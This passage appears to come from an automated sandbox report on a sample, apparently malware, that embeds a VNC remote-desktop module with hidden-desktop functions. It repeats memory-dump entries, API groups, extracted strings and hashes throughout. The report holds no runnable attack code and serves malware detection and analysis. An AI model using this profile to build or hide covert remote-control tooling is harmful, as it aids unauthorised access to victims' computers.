                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                      • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                      • API String ID: 1907048692-1814171851
                                                      • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                      • Instruction ID: 7cf0db2a57a3c73ccca3026ce77b57a76112e3d104054a337913befeadbaee40
                                                      • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                      • Instruction Fuzzy Hash: 3F311762A28A8291EB34EB31B8542EAB3A1FF89754FC45031D98E47754DF3CF14687A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                      • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 1769082246-4238595597
                                                      • Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                      • Instruction ID: 63072b6d7261cdf3852aad528e18576acc4f7443c772b12b44be05ec09436111
                                                      • Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                      • Instruction Fuzzy Hash: 10E1A02661C6D185E760EB39C458BFEBBA1EF86B88F854131DA4C477A5CF38E441C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$Leave
                                                      • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 2801635615-1537001432
                                                      • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                      • Instruction ID: 663f5648bb8a8128fc53b913bc33ac7bcd3e486c5cf467dc3d2a9204dead41ce
                                                      • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                      • Instruction Fuzzy Hash: 5BD1A326A1CA9185E760EB35C4587FEBBA0EF86B88F954131CA4D477A5CF38F485C720
                                                      APIs
                                                      Strings
                                                      • HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF790C3AC17
                                                      • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF790C3ABB9
                                                      • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF790C3ABD4
                                                      • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF790C3AC72
                                                      • HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF790C3AC2F
                                                      • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF790C3AC8A
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorInfoLastParametersSystem
                                                      • String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
                                                      • API String ID: 2777246624-426764769
                                                      • Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                      • Instruction ID: 21dd84a55181db5ba14a30bad21e00e50a707dcb858550135a4dfaf80bddb82d
                                                      • Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                      • Instruction Fuzzy Hash: 013136A4A3854796F734BB31A800BB5E7A0BF55748FC0A036C40E533A0DE2EF84AC760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                      • String ID:
                                                      • API String ID: 4219907860-0
                                                      • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                      • Instruction ID: f2a7fed4c2ea39e52ec98b45e476fdc36e5af8a5f31390167d720d7a819140ef
                                                      • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                      • Instruction Fuzzy Hash: 25416626624A8296E730AF35A8546AEB3B4FF89BD8F845035DE4E47B54DF3CE104C714
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$Free$AddressLoadProc
                                                      • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                      • API String ID: 1386263645-671781545
                                                      • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                      • Instruction ID: 56ce911ac21f3815030b945d8c864e5090a2b91adf803c2249a235074df44f96
                                                      • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                      • Instruction Fuzzy Hash: 99419C7592CA0396EB78AF31E4543BCA2A4EF46B6AF981130C91D463D4DF7CF4848221
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                      • API String ID: 3057866299-2798169553
                                                      • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                      • Instruction ID: a6cc2459eac960742cc72d0b6358d4d78e3a231927885304cc5d57ffd04e6910
                                                      • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                      • Instruction Fuzzy Hash: 3831CA21A3A64690EEB9FB35D4912F8E2A1AF55744FC81435EB0D463A2FF2CF854C360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$CreateOpenQueryValueVersion
                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                      • API String ID: 1076069355-3579764778
                                                      • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                      • Instruction ID: d299e3539f6d0c9689fb559f51413f0601ae5507a6febb21f2710a5d9ff65b4a
                                                      • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                      • Instruction Fuzzy Hash: 64310E72A18B8286EB70AB30F4553AAF7B0FB89754F801135E68D46B64DF7CE159CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                      • String ID:
                                                      • API String ID: 707770685-0
                                                      • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                      • Instruction ID: 0cb3e3d969dea026f7911e498809f591b8e01b4a587a4ce990ceb8d2f16dc87b
                                                      • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                      • Instruction Fuzzy Hash: D0418432628B4186D660AB35E4442A9B3B1FFCABD0F951231EA9E477A5CF3CE545C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$Free$Unlock$Lock$Allocfree
                                                      • String ID:
                                                      • API String ID: 2417228145-0
                                                      • Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                      • Instruction ID: e384c5ce4c292c84064d2eaa15a779e0b0913d9e144e91d477e6ed7746cc22b2
                                                      • Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                      • Instruction Fuzzy Hash: 9F512536A24B4285DB609F36E4802E8B7B0FB99F98F495436CE5D47724DF78E494C720
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Combine$DeleteObjectfree$CreateRect
                                                      • String ID:
                                                      • API String ID: 3143477926-0
                                                      • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                      • Instruction ID: 6ce448fd755e4a4760c81d0a1ff75ca2600e4244a40ada249cc07c0605b8c6c6
                                                      • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                      • Instruction Fuzzy Hash: E9412D72628A8291DA60AB35E8544AEB730FFCABD4F805131EE8E47764CE3CE545C714
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                      • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                      • API String ID: 524037307-261918508
                                                      • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                      • Instruction ID: 3a06912c3fa286f737f24fe59e9f16755b978fd8f8b993552be3081a8700de6d
                                                      • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                      • Instruction Fuzzy Hash: D221EE32524B8291D711DF34E9842E8B3BCFF54B88F985136DA4C4A669DF78E695C330
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 4065787043-3977938048
                                                      • Opcode ID: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
                                                      • Instruction ID: 458886490600695ff2c2e942c01a0b7149862fdab640e427005a7144f00ddb66
                                                      • Opcode Fuzzy Hash: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
                                                      • Instruction Fuzzy Hash: 25E1C226A1CA8185E764AB35C4587FEB7A1EF82B98F954235CA5C473E5CF38F481C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
